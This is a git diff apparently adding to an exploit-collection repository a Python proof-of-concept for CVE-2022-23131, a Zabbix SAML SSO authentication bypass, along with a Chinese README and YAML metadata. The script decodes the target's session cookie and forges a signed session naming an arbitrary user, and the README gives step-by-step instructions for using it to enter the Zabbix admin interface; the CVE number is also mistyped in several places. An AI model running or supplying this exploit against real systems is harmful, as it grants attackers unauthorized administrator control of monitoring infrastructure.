diff --git a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-231231.py b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-231231.py new file mode 100644 index 0000000000000000000000000000000000000000..881c7d68b81161bb0d8019c5d8808a25e8231542 --- /dev/null +++ b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-231231.py @@ -0,0 +1,37 @@ +import requests +import re +import urllib.parse +import base64 +import json +import sys + +def exp(target, username): + resp = requests.get(url=target, verify=False) + cookie = resp.headers.get("Set-Cookie") + + zbx_session = re.findall(r"zbx_session=(.*?); ", cookie) + + url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8') + base64_decode_data = base64.b64decode(url_decode_data) + + decode_to_str = str(base64_decode_data, encoding='utf-8') + + to_json = json.loads(decode_to_str) + + tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"]) + + payloadJson = json.dumps(tmp_ojb) + print("decode_payload:", payloadJson) + + payload = urllib.parse.quote(base64.b64encode(payloadJson.encode())) + print("zbx_signed_session:", payload) + + +if __name__ == "__main__": + if len(sys.argv) != 3: + print("argv error") + exit(0) + target = sys.argv[1] + username = sys.argv[2] + + exp(target, username) \ No newline at end of file diff --git a/cve/zabbix/2022/CVE-2022-23131/README.md b/cve/zabbix/2022/CVE-2022-23131/README.md new file mode 100644 index 0000000000000000000000000000000000000000..bd13b10a9cf767ecd0547743377efcdb764b7310 --- /dev/null +++ b/cve/zabbix/2022/CVE-2022-23131/README.md @@ -0,0 +1,4 @@ +CVE-2022-23131 +使用方式:python3 CVE-2022-23131.py target Admin +其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面 + diff --git a/cve/zabbix/2022/yaml/CVE-2022-231231.yaml b/cve/zabbix/2022/yaml/CVE-2022-231231.yaml new file mode 100644 index 0000000000000000000000000000000000000000..2dd6e8071950ff964a4bc45b94645fd5f3f82ef9 --- /dev/null +++ b/cve/zabbix/2022/yaml/CVE-2022-231231.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-231231 +source: + https://github.com/L0ading-x/cve-2022-23131 +info: + name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 + severity: critical + description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 + scope-of-influence: + Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 + - https://www.secpulse.com/archives/179601.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-231231 + cwe-id: CWE-290 + cnvd-id: None + kve-id: None + tags: 前端认证绕过漏洞 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index 8f7ee8353f76c96f302356cad99b94a9239dfcc9..faf9a7b2b18725dadd07b2608cfd78ce876b2784 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -41,4 +41,6 @@ cve: - CVE-2023-28432 Node.js: - CVE-2021-21315 + zabbix: + - CVE-2022-231231 cnvd: